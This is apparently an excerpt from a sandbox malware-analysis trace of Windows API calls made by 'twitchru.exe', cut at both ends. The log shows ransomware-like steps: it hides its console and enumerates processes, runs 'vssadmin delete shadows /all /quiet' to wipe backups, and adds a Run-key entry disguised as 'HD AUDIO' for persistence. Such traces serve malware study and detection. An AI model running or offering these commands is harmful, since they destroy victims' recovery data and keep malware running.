\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xaf\xaf\x78\xc5\xac\xa8\x0b\x02\x38\x22\x43", lpUsedDefaultChar=0x0) returned 256 [0119.456] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x452c88, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0119.456] RtlInitializeSListHead (in: ListHead=0x452928 | out: ListHead=0x452928) [0119.456] GetLastError () returned 0x0 [0119.456] SetLastError (dwErrCode=0x0) [0119.456] GetEnvironmentStringsW () returned 0x69e240* [0119.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1331, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1331 [0119.456] FreeEnvironmentStringsW (penv=0x69e240) returned 1 [0119.456] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b340) returned 0x427e10 [0119.457] GetCurrentThread () returned 0xfffffffe [0119.457] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x20ba8e8, lpExitTime=0x20ba8f0, lpKernelTime=0x20ba8f0, lpUserTime=0x20ba8f0 | out: lpCreationTime=0x20ba8e8, lpExitTime=0x20ba8f0, lpKernelTime=0x20ba8f0, lpUserTime=0x20ba8f0) returned 1 [0119.457] RtlInitializeSListHead (in: ListHead=0x4529d0 | out: ListHead=0x4529d0) [0119.457] GetConsoleWindow () returned 0x30200 [0119.458] ShowWindow (hWnd=0x30200, nCmdShow=0) returned 1 [0119.463] RegGetValueA (in: hkey=0x80000001, lpSubKey="Software\\FUCK\\", lpValue="PERSONALID", dwFlags=0x2, pdwType=0x0, pvData=0x20ba4e0, pcbData=0x20ba4ac*=0x104 | out: pdwType=0x0, pvData=0x20ba4e0, pcbData=0x20ba4ac*=0x104) returned 0x2 [0119.463] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0119.463] GetProcAddress (hModule=0x74e70000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x74f308e0 [0119.464] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x20ba468 | out: lpSystemTimeAsFileTime=0x20ba468) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.465] GetLastError () returned 0x0 [0119.465] SetLastError (dwErrCode=0x0) [0119.465] GetLastError () returned 0x0 [0119.465] SetLastError (dwErrCode=0x0) [0119.465] GetLastError () returned 0x0 [0119.465] SetLastError (dwErrCode=0x0) [0119.465] GetLastError () returned 0x0 [0119.465] SetLastError (dwErrCode=0x0) [0119.465] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\FUCK\\", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x20ba4a8, lpdwDisposition=0x0 | out: phkResult=0x20ba4a8*=0x5cd0, lpdwDisposition=0x0) returned 0x0 [0119.465] RegSetValueExA (in: hKey=0x5cd0, lpValueName="PERSONALID", Reserved=0x0, dwType=0x1, lpData="zMlQmGdpLLDFBsqtfeUO", cbData=0x14 | out: lpData="zMlQmGdpLLDFBsqtfeUO") returned 0x0 [0119.465] RegCloseKey (hKey=0x5cd0) returned 0x0 [0119.466] CryptBinaryToStringA (in: pbBinary=0x5bcc50, cbBinary=0x14, dwFlags=0x1, pszString=0x0, pcchString=0x20ba6e4 | out: pszString=0x0, pcchString=0x20ba6e4) returned 1 [0119.466] CryptBinaryToStringA (in: pbBinary=0x5bcc50, cbBinary=0x14, dwFlags=0x1, pszString=0x20ba6e8, pcchString=0x20ba6e4 | out: pszString="ek1sUW1HZHBMTERGQnNxdGZlVU8=\r\n", pcchString=0x20ba6e4) returned 1 [0119.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0119.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5cd0 [0119.471] Process32First (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.472] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x66, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.472] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.473] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x150, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.474] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x150, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.474] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.475] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.476] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x198, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.492] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x198, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.500] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.500] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.501] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.502] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.502] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.503] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.504] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.504] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.505] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.506] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.506] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.507] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.508] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0119.509] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.510] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0119.510] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0119.511] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x4ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.512] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0119.512] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0119.513] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0119.514] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0119.514] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="unilikelystrap.exe")) returned 1 [0119.515] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="treoturkey.exe")) returned 1 [0119.515] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="drainage because.exe")) returned 1 [0119.516] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="kodak_bring_headers.exe")) returned 1 [0119.517] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="yellow.exe")) returned 1 [0119.517] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="alive.exe")) returned 1 [0119.518] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="delay-keyboards.exe")) returned 1 [0119.519] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="interactions miles.exe")) returned 1 [0119.519] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="pdf-incoming.exe")) returned 1 [0119.520] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="tremendous.exe")) returned 1 [0119.521] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="uncertainty_furnishings.exe")) returned 1 [0119.521] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom-prospect.exe")) returned 1 [0119.522] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="word.exe")) returned 1 [0119.523] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1 [0119.528] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="likes.exe")) returned 1 [0119.529] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="continuedrussiafloors.exe")) returned 1 [0119.530] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="fill audi.exe")) returned 1 [0119.530] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="unto.exe")) returned 1 [0119.531] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="bear-colin-installations.exe")) returned 1 [0119.532] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="picksemergingporter.exe")) returned 1 [0119.532] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x768, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="hashydraulic.exe")) returned 1 [0119.533] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.534] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x508, pcPriClassBase=8, dwFlags=0x0, szExeFile="twitchru.exe")) returned 1 [0119.534] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x56c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0119.535] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.535] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.536] Process32Next (in: hSnapshot=0x5cd0, lppe=0x20ba49c | out: lppe=0x20ba49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0119.537] CloseHandle (hObject=0x5cd0) returned 1 [0119.537] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /c vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x100, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x20ba630*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ba61c | out: lpCommandLine="cmd /c vssadmin delete shadows /all /quiet", lpProcessInformation=0x20ba61c*(hProcess=0x5cd0, hThread=0x5cd4, dwProcessId=0xcb4, dwThreadId=0xcb8)) returned 1 [0119.922] WaitForSingleObject (hHandle=0x5cd0, dwMilliseconds=0xffffffff) returned 0x0 [0125.776] CloseHandle (hObject=0x5cd0) returned 1 [0125.776] CloseHandle (hObject=0x5cd4) returned 1 [0125.776] GetLogicalDriveStringsA (in: nBufferLength=0x1a, lpBuffer=0x20ba8e8 | out: lpBuffer="C:\\") returned 0x4 [0125.776] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0125.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20ba7e8, nSize=0x100 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0125.776] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x20ba62c, lpdwDisposition=0x0 | out: phkResult=0x20ba62c*=0x5cd4, lpdwDisposition=0x0) returned 0x0 [0125.776] RegSetValueExA (in: hKey=0x5cd4, lpValueName="HD AUDIO", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", cbData=0x2a | out: 